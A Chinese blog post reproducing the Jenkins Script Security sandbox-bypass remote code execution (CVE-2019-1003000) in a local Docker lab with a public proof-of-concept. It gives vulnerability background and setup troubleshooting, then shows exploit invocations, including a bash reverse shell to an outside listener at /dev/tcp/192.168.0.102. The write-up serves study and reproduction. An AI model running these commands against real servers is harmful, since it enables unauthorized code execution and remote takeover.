jenkins rec cve-2019-1003000 复现

短命女 2021-08-31 15:49 254阅读 0赞

0X1 漏洞预警

2019年1月8日，Jenkins官方发布了一则Script Security and Pipeline 插件远程代码执行漏洞的安全公告，漏洞CVE编号为：CVE-2019-1003000，官方定级为高危。2019年2月15日，网上公布了该漏洞的利用方式，该漏洞允许具有“Overall/Read”权限的用户或能够控制SCM中的Jenkinsfile或者sandboxed Pipeline共享库内容的用户绕过沙盒保护并在Jenkins主服务器上执行任意代码。

Jenkins是一个开源软件项目，是基于Java开发的一种持续集成工具，用于监控持续重复的工作，旨在提供一个开放易用的软件平台，使软件的持续集成变成可能。Jenkins的目的是持续、自动地构建/测试软件项目以及监控软件开放流程，快速问题定位及处理，提示开放效率。

Script Security and Pipeline 插件是Jenkins的一个安全插件，可以集成到Jenkins各种功能插件中。它主要支持两个相关系统：脚本批准和Groovy沙盒。

该漏洞存在于Declarative Plugin 1.3.4.1之前的版本, Groovy Plugin 2.61.1之前的版本以及 Script Security Plugin 1.50之前的版本。该漏洞通过将AST转换注释（如@Grab）应用于源代码元素，可以在脚本编译阶段避免脚本安全沙箱保护。所以会造成具有“Overall/Read”权限的用户或能够控制SCM中的Jenkinsfile或者sandboxed Pipeline共享库内容的用户可以绕过沙盒保护并在Jenkins主服务器上执行任意代码。

0X2 漏洞复现

可以在官网下载漏洞版本，我们在此选择其他安全研究人员已经测试好的demo进行测试，下载地址：

https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc

分别在Kali下和Ubuntu16.04下搭建，发现Ubuntu下的环境在运行的时候失败了，原因是docker版本过旧，安装的是docker.io，所以请务必安装最新的docker-ce。本次环境在kali下进行，并且kali已经安装了最新版的docker，安装方法请自行度娘。

代码下载链接：

https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc

下载之后，安装依赖环境：

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3doYXRkYXk_size_16_color_FFFFFF_t_70][]

进入sample-vuln文件件，拉取环境：

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3doYXRkYXk_size_16_color_FFFFFF_t_70 1][]

拉取完成之后，开始运行环境，但是一直没有启动来，一运行启动命令，ps查看都没有容器实例：

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3doYXRkYXk_size_16_color_FFFFFF_t_70 2][]

再次编辑运行脚本，去掉--rm子命令，不用自动移除相同名称的容器。再次运行之后，docker ps -a查看能够发现环境实例存在，但是docker ps没有，上一条的命令显示环境一启动就退出了，通过日志命令docker logs container\_id 排查：

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3doYXRkYXk_size_16_color_FFFFFF_t_70 3][]

发现是权限问题，本地的jenkinsdata文件夹是root权限，而jenkins的权限很小，uid等信息都是1000，所以修改jenkinsdata的权限并删除之前的容器再次运行脚本，即可启动环境：

![20200719194708621.jpeg][]

这样环境已经启动ok了！

由于环境是作者已经搭建好的，因此我们进入到容器中，并没有发现初始化密码的文件secrets/initialAdminPassword的存在：

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3doYXRkYXk_size_16_color_FFFFFF_t_70 4][]

所以只能使用user1/user1进行登录，并发现已有的job任务my-pipeline已经被创建好

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3doYXRkYXk_size_16_color_FFFFFF_t_70 5][]

下面利用已有的信息进行漏洞利用：

python exploit.py --url http://localhost:8080 --job my-pipeline --username user1 --password user1 --cmd "whoami"

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3doYXRkYXk_size_16_color_FFFFFF_t_70 6][]

反弹shell成功：

python exploit.py --url http://localhost:8080 --job my-pipeline --username user1 --password user1 --cmd "bash -i >& /dev/tcp/192.168.0.102/12345 0>&1"

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3doYXRkYXk_size_16_color_FFFFFF_t_70 7][]

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3doYXRkYXk_size_16_color_FFFFFF_t_70 8][]

至此，漏洞利用成功！

实验的难点在于jenkins 2.152-alpine的安装搭建，并且漏洞的几个插件都已经被官方修复，在系统配置中安装的时候，security-script很容易被升级到最新版，利用就会失败！

做实验不容易，且行且珍惜！

参考链接：

https://github.com/petercunha/Jenkins-PreAuth-RCE-PoC

https://devco.re/blog/2019/02/19/hacking-Jenkins-part2-abusing-meta-programming-for-unauthenticated-RCE/

https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3doYXRkYXk_size_16_color_FFFFFF_t_70]: /images/20210728/7c7cb98d991444e880ba73172398656f.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3doYXRkYXk_size_16_color_FFFFFF_t_70 1]: /images/20210728/09c4ca4076424d13856898dc75173073.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3doYXRkYXk_size_16_color_FFFFFF_t_70 2]: /images/20210728/7d1d247836f941d7980d06288c640a49.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3doYXRkYXk_size_16_color_FFFFFF_t_70 3]: /images/20210728/7372fe3ca6a8409b8a3cc23f05121f3d.png
[20200719194708621.jpeg]: /images/20210728/7554bbbdb1544c05bbba1abf86eb75ba.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3doYXRkYXk_size_16_color_FFFFFF_t_70 4]: /images/20210728/569a93d24a7d4168ac8c2efed0231476.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3doYXRkYXk_size_16_color_FFFFFF_t_70 5]: /images/20210728/a3c735713e304658ad8d880f7578d7d3.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3doYXRkYXk_size_16_color_FFFFFF_t_70 6]: /images/20210728/26d9ff0998e348da87843a6f80f10f7c.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3doYXRkYXk_size_16_color_FFFFFF_t_70 7]: /images/20210728/07df5f8f7d014a8f98ffe6d0eb1eca27.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3doYXRkYXk_size_16_color_FFFFFF_t_70 8]: /images/20210728/9aa280e7c9a248338a4bdfea53027696.png